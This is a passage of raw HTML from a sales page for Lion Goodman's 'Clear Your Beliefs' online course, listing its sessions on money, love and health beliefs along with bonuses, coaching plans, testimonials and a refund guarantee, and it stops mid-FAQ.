src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to 